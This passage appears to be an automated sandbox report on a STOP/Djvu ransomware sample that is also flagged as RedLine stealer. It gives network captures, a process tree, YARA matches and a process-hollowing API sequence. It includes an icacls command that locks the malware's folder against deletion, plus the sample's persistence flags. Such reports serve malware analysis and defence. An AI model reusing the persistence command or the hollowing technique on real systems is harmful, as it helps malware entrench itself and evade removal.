                                                                                                2024-04-24 13:57:10 UTC473INData Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 30 37 36 66 36 32 36 62 37 37 34 37 33 35 36 65 37 37 32 39 37 32 36 36 33 38 37 34 37 32 36 35 36 64 36 32 36 34 37 33 33 61 33 35 36 65 37 37 32 39 37 32 36 36 22 3e
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#076f626b7747356e77297266387472656d6264733a356e77297266">
                                                                                                2024-04-24 13:57:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                4 | 192.168.2.5 | 49716 | 104.21.65.24 | 443 | 2616 | C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-24 13:57:17 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-04-24 13:57:18 UTC | 914 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:57:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9SThYXht%2FM1zBofmhG%2FVEW2qroeKJ%2BXx9LkHqy9efBXFjqWe1rE7vFwJjR3aJ5LJnP8soJ80ffT6JRJ3qVmxfEz0fii4k9oo53MZDvhVyniEwRjPOIQbD%2BupuYIj"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87969a03df4f2ad0-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:57:18 UTC455INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 62 64 64 35 64 38 64 31 63 64 66 64 38 66 64 34 63 64 39 33 64 30 64 38 38 32 63 65 63 38 64 66 64 37 64 38 64 65
                                                                                                Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#bdd5d8d1cdfd8fd4cd93d0d882cec8dfd7d8de
                                                                                                2024-04-24 13:57:18 UTC475INData Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 31 61 39 61 34 61 64 62 31 38 31 66 33 61 38 62 31 65 66 62 34 61 30 66 65 62 32 62 34 61 33 61 62 61 34 61 32 62 35 66 63 66 33 61 38 62 31 65 66 62 34 61 30
                                                                                                Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#c1a9a4adb181f3a8b1efb4a0feb2b4a3aba4a2b5fcf3a8b1efb4a0
                                                                                                2024-04-24 13:57:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0



                                                                                                Target ID:0
                                                                                                Start time:15:56:50
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:15:56:50
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:15:56:52
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                Imagebase:0x350000
                                                                                                File size:29'696 bytes
                                                                                                MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:15:56:52
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:15:56:53
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:15:56:53
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 45%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:15:56:54
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:9
                                                                                                Start time:15:57:05
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2156092371.000000000444D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:15:57:05
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:15:57:15
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2241428739.00000000044D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:15:57:15
                                                                                                Start date:24/04/2024
                                                                                                Path:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                                                Imagebase:0x400000
                                                                                                File size:781'824 bytes
                                                                                                MD5 hash:E9FF14A975F084F01373D468C0B91A16
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:44.7%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 32526 5dd0000 32529 5dd0630 32526->32529 32528 5dd0005 32530 5dd064c 32529->32530 32532 5dd1577 32530->32532 32535 5dd05b0 32532->32535 32539 5dd05dc 32535->32539 32536 5dd061e 32537 5dd05e2 GetFileAttributesA 32537->32539 32539->32536 32539->32537 32540 5dd0420 32539->32540 32541 5dd04f3 32540->32541 32542 5dd04ff CreateWindowExA 32541->32542 32543 5dd04fa 32541->32543 32542->32543 32544 5dd0540 PostMessageA 32542->32544 32543->32539 32545 5dd055f 32544->32545 32545->32543 32547 5dd0110 VirtualAlloc GetModuleFileNameA 32545->32547 32548 5dd017d CreateProcessA 32547->32548 32549 5dd0414 32547->32549 32548->32549 32551 5dd025f VirtualFree VirtualAlloc Wow64GetThreadContext 32548->32551 32549->32545 32551->32549 32552 5dd02a9 ReadProcessMemory 32551->32552 32553 5dd02e5 VirtualAllocEx NtWriteVirtualMemory 32552->32553 32554 5dd02d5 NtUnmapViewOfSection 32552->32554 32557 5dd033b 32553->32557 32554->32553 32555 5dd039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32558 5dd03fb ExitProcess 32555->32558 32556 5dd0350 NtWriteVirtualMemory 32556->32557 32557->32555 32557->32556 32560 4388026 32561 4388035 32560->32561 32564 43887c6 32561->32564 32566 43887e1 32564->32566 32565 43887ea CreateToolhelp32Snapshot 32565->32566 32567 4388806 Module32First 32565->32567 32566->32565 32566->32567 32568 4388815 32567->32568 32570 438803e 32567->32570 32571 4388485 32568->32571 32572 43884b0 32571->32572 32573 43884f9 32572->32573 32574 43884c1 VirtualAlloc 32572->32574 32573->32573 32574->32573

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DD0156
                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DD016C
                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 05DD0255
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DD0270
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DD0283
                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DD029F
                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DD02C8
                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DD02E3
                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DD0304
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DD032A
                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DD0399
                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DD03BF
                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DD03E1
                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 05DD03ED
                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 05DD0412
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                  • String ID:
                                                                                                  • API String ID: 93872480-0
                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction ID: d1abb6f712b7367359e42187b8f22fcac9a618077d28a39e79142cc119e792e0
                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                  • Instruction Fuzzy Hash: BEB1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E949AB395D771AD41CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 41 43887c6-43887df 42 43887e1-43887e3 41->42 43 43887ea-43887f6 CreateToolhelp32Snapshot 42->43 44 43887e5 42->44 45 43887f8-43887fe 43->45 46 4388806-4388813 Module32First 43->46 44->43 45->46 53 4388800-4388804 45->53 47 438881c-4388824 46->47 48 4388815-4388816 call 4388485 46->48 51 438881b 48->51 51->47 53->42 53->46
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 043887EE
                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0438880E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 3833638111-0
                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction ID: eabaf22ebb7b6422de57d8e2a02ceff64d6d78b4d983bd16eb476d3cb35f6c76
                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                  • Instruction Fuzzy Hash: CCF062362007146BD7247BB5A88DA6AB6E8AF49765F50152CE642910C0DA70F8454661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 15 5dd0420-5dd04f8 17 5dd04ff-5dd053c CreateWindowExA 15->17 18 5dd04fa 15->18 20 5dd053e 17->20 21 5dd0540-5dd0558 PostMessageA 17->21 19 5dd05aa-5dd05ad 18->19 20->19 22 5dd055f-5dd0563 21->22 22->19 23 5dd0565-5dd0579 22->23 23->19 25 5dd057b-5dd0582 23->25 26 5dd05a8 25->26 27 5dd0584-5dd0588 25->27 26->22 27->26 28 5dd058a-5dd0591 27->28 28->26 29 5dd0593-5dd0597 call 5dd0110 28->29 31 5dd059c-5dd05a5 29->31 31->26
                                                                                                  APIs
                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DD0533
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                  • API String ID: 716092398-2341455598
                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction ID: e685e120e65cb4f836bc9a60c006d1e34072bcfffe8d5d8c16f1f15b559413e6
                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                  • Instruction Fuzzy Hash: 01512870D08388DAEB11CBA8C849BEDBFB2AF51708F144059D5446F2C6D3BA5658CB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 32 5dd05b0-5dd05d5 33 5dd05dc-5dd05e0 32->33 34 5dd061e-5dd0621 33->34 35 5dd05e2-5dd05f5 GetFileAttributesA 33->35 36 5dd05f7-5dd05fe 35->36 37 5dd0613-5dd061c 35->37 36->37 38 5dd0600-5dd060b call 5dd0420 36->38 37->33 40 5dd0610 38->40 40->37
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DD05EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID: apfHQ$o
                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction ID: 97021847b372dd07ac09906e172f9a1d69b2c5d1071a23119fbdf493512fd7f9
                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                  • Instruction Fuzzy Hash: 04011E70C0424CEBDB10DBA8C5187AEFFB5AF41308F148099C4492B241E7769B58CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 54 4388485-43884bf call 4388798 57 438850d 54->57 58 43884c1-43884f4 VirtualAlloc call 4388512 54->58 57->57 60 43884f9-438850b 58->60 60->57
                                                                                                  APIs
